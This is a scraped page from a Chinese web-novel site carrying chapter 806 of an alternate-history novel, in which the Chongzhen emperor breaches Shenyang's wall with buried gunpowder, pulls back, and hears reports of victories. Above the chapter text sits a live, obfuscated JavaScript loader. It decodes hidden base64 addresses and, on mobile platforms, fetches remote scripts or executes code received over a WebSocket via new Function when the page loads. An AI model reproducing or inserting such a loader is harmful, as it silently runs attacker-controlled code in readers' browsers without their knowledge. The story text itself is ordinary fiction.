笔趣阁

字:
关灯 护眼
笔趣阁 > 明朝那些事儿 > 806 将战
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

806 将战

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
谁也不知道朱由检在沈阳城门处埋了多少炸药,就连朱由检自己都不知道,他只知道,有空就往城墙下埋,反正距离三公里,黑火药无论如何也影响不到这边。
  因此,当爆炸产生的时候,就连朱由检自己都非常震惊,更不要说黄太吉的骑兵队伍了,爆裂的声音,让万马嘶吼起来,顿时整个骑兵队伍大乱,别说继续攻击了,就连约束好队伍不散乱开都是一件非常难的事情。
  而等到黄太吉终于再次掌控得住队伍的时候,却看到,原本和他们交战的两支骑兵,却借助早就有的心理准备,以及战马更加适应这种爆炸声,迅速的拉开距离,调转方向,朝着沈阳城冲杀过去。
  而随着白色的烟尘散去,沈阳北面的情况呈现在所有人的眼前,城墙坍塌,残乱的断石当中,夹杂着很多残肢断臂,而在原本城门口处,更是直接出现了一个大坑,坑很大,骑兵无法直接冲进去,但若是下马进入,却是毫无问题。
  因为巨大的爆炸和伤害,此刻北门却是没有多少守军,根本无法阻挡即将抵达的两万骑兵。
  “该死,大意了!”黄太吉高叫道,他还是低估了黑火药的威力,没想到竟然大到这种程度,就连他们远离几公里都受到了影响。
  “回援,回援!”一边高喊着,黄太吉一边策动马匹,带着人往那边赶去。
  两万精锐骑兵入城,足以攻克沈阳,一旦沈阳失去,满族就成了无根浮萍,随时都有可能覆灭。
  好在,朱由检并不打算真的进攻,只不过是做个姿态而已,因此当黄太吉率军退回去救援时,他就立刻撤兵。
  当然,更主要的是,朱由检没有找到很好的机会,覆灭满清。他是有能力在黄太吉回归之前攻占沈阳的,但是一个没了牵挂的八旗兵将会极其可怕,不消灭这些精锐的八旗兵,光是断了他们的根基,后果非常严重。
  没了希望的他们,会产生极大的破坏。尤其是带领着这些人的是黄太吉,会更加的可怕。
  朱由检要的是一个完好的辽东,而想要这些,必须屠灭黄太吉,杀光满清的青壮之人。
  当然,之所以撤退,更重要的是没有找到机会,不论是之前打沈阳还是现在,他是能攻进去,但也只是攻进去,一旦陷入包围,他这两万骑兵就别想要了,而没了骑兵,作战时他拿什么护翼左右,怎么追击敌人?
  朱由检的大军撤回营地,而黄太吉的军队也在北门处安营扎寨,挡在了那处坍塌的缺口前面。当安定下来后,城中出现了大量的人群,肩挑手扛的,开始清理废墟,对城墙进行修缮。
  黄太吉不想进攻,要护住城墙维修,而朱由检则不愿意进攻,营地内,那些新兵们正在深化训练和学习,他们在不断消化这场战争获得的经验。
  而有了这次的战斗经验,这些人也算得上是老兵了,其战力,和上次相比,强了数筹。
  五日后,赵率教和曹变蛟带着五师以及二师的骑兵旅来到了沈阳,和朱由检大军顺利汇合。
  “末将参见陛下。”两人大礼跪拜道,神情中充满了激动。
  “都起来吧。”朱由检颔首,对于这两人能够主动出击,迟滞黄太吉在关内的行动,他是十分高兴的。
  虽然这是他制定的计划,以百姓为诱饵,有些残忍,但却又不希望麾下的将领也是如此,如今有人愿意去保护百姓,这说明他的一些教育和理念得到了贯彻。
  说起来矛盾,但皇帝其实就是这么一种矛盾的生物。
  “都说说,你们带来了什么好的消息?”朱由检笑着问道,通传的信使和他们一起来,他们想必已经知道了,故而他干脆直接问道。
  “陛下,大喜啊!”赵率教大声道,“曹文昭将军风雪夜袭三部联军,以火油焚其营地,后又在大雪天气追击三日,大破之,三部联军已经溃逃,死伤无数,剩余之人,遁入青海,不知所踪。”
  “曹文昭竟如此神勇?”朱由检大为吃惊,这时候他才正视起来,历史对其明末第一良将的评价。
  果然,越是劣势的时候,这些人的才能越会凸显出来,曹文昭用三万破十万的战绩,彰显了自己强悍过人的本领。
  朱由检微微笑着,觉得自己当初从辽东将他们五人简拔出来果真没有做错。
  “陛下,还有更大的喜讯呢!”曹变蛟也是笑哈哈道。
  “还有什么更大的喜讯?”朱由检这些有些不解了,什么样的消息能凌驾于这场战士的胜利?
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师